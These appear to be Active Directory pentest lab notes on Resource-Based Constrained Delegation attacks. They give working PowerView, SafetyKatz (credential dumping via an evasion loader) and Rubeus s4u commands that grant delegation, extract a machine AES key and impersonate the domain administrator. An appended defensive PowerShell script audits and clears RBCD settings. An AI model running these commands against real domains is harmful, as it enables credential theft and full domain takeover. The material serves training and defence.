Resource-Based Constrained Delegation (RBCD)
What is an RBCD Attack?
Resource-Based Constrained Delegation (RBCD) lets the owner of a resource (a computer object) decide which accounts may delegate authentication to it. Unlike traditional delegation, configuring it doesn't require Domain Admin privileges. If an attacker has write permissions (GenericWrite or WriteProperty) over a computer object, they can modify its msDS-AllowedToActOnBehalfOfOtherIdentity attribute so that a machine account they control can impersonate any domain user (such as a Domain Admin) to that target.
Enumeration
# Find computers where a compromised user has write permissions
. C:\AD\Tools\PowerView.ps1
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}
# Check if RBCD is already configured on a target
Get-DomainRBCD -Identity dcorp-mgmt
# Checking attributes manually
Get-ADComputer -Identity dcorp-mgmt -Properties "msDS-AllowedToActOnBehalfOfOtherIdentity"
Exploitation
Configure Delegation
# Granting your student VM permission to delegate to the target
Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std544$' -Verbose
Extract Machine Keys
# Extract the AES256 key of the machine account (the one ending in $)
# Look for Authentication Id: 0;999 (SYSTEM session)
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit"
Impersonate Administrator
# Request a TGS for the Administrator user and inject it into memory (/ptt)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-std544$ /aes256:44219e614e95a77d35ea874854eb6195a5d0f2efde85b2ed98d3481ca1638805 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt
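Auditing RBCD configuration
To see where msDS-AllowedToActOnBehalfOfOtherIdentity is set and which accounts it trusts, the following added example (not part of the original notes) lists every computer in the domain with the attribute populated and resolves each trusted SID. It assumes the RSAT ActiveDirectory module and read access to the domain; the function name Get-RbcdAudit is hypothetical.

```powershell
# Added defensive example: list every computer with RBCD configured and who it trusts.
# Assumes the RSAT ActiveDirectory module; Get-RbcdAudit is a hypothetical helper name.
Import-Module ActiveDirectory

$attr    = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
$sidType = [System.Security.Principal.SecurityIdentifier]

function Get-RbcdAudit {
    # Only computers where the attribute is populated
    Get-ADComputer -LDAPFilter "($attr=*)" -Properties $attr, whenChanged | ForEach-Object {
        $target = $_
        # The attribute is a security descriptor; each ACE names one trusted principal.
        # Asking for SIDs avoids failures on trustees that no longer resolve to a name.
        $rules = $target.$attr.GetAccessRules($true, $true, $sidType)
        foreach ($rule in $rules) {
            $sid     = $rule.IdentityReference.Value
            $trustee = Get-ADObject -Filter "objectSid -eq '$sid'" -Properties sAMAccountName, whenCreated
            [pscustomobject]@{
                Target         = $target.Name
                # whenChanged is the last change to the object (any attribute), not only RBCD
                TargetChanged  = $target.whenChanged
                TrusteeSid     = $sid
                Trustee        = if ($trustee) { $trustee.sAMAccountName } else { '<unresolved>' }
                TrusteeClass   = if ($trustee) { $trustee.ObjectClass } else { $null }
                TrusteeCreated = if ($trustee) { $trustee.whenCreated } else { $null }
            }
        }
    }
}

# Most recently modified targets first
Get-RbcdAudit | Sort-Object TargetChanged -Descending | Format-Table -AutoSize
```

Entries whose trustee is an unexpected or recently created machine account deserve review. `Set-ADComputer -Identity <name> -PrincipalsAllowedToDelegateToAccount $null` clears the attribute on a target once the entry is confirmed as unwanted.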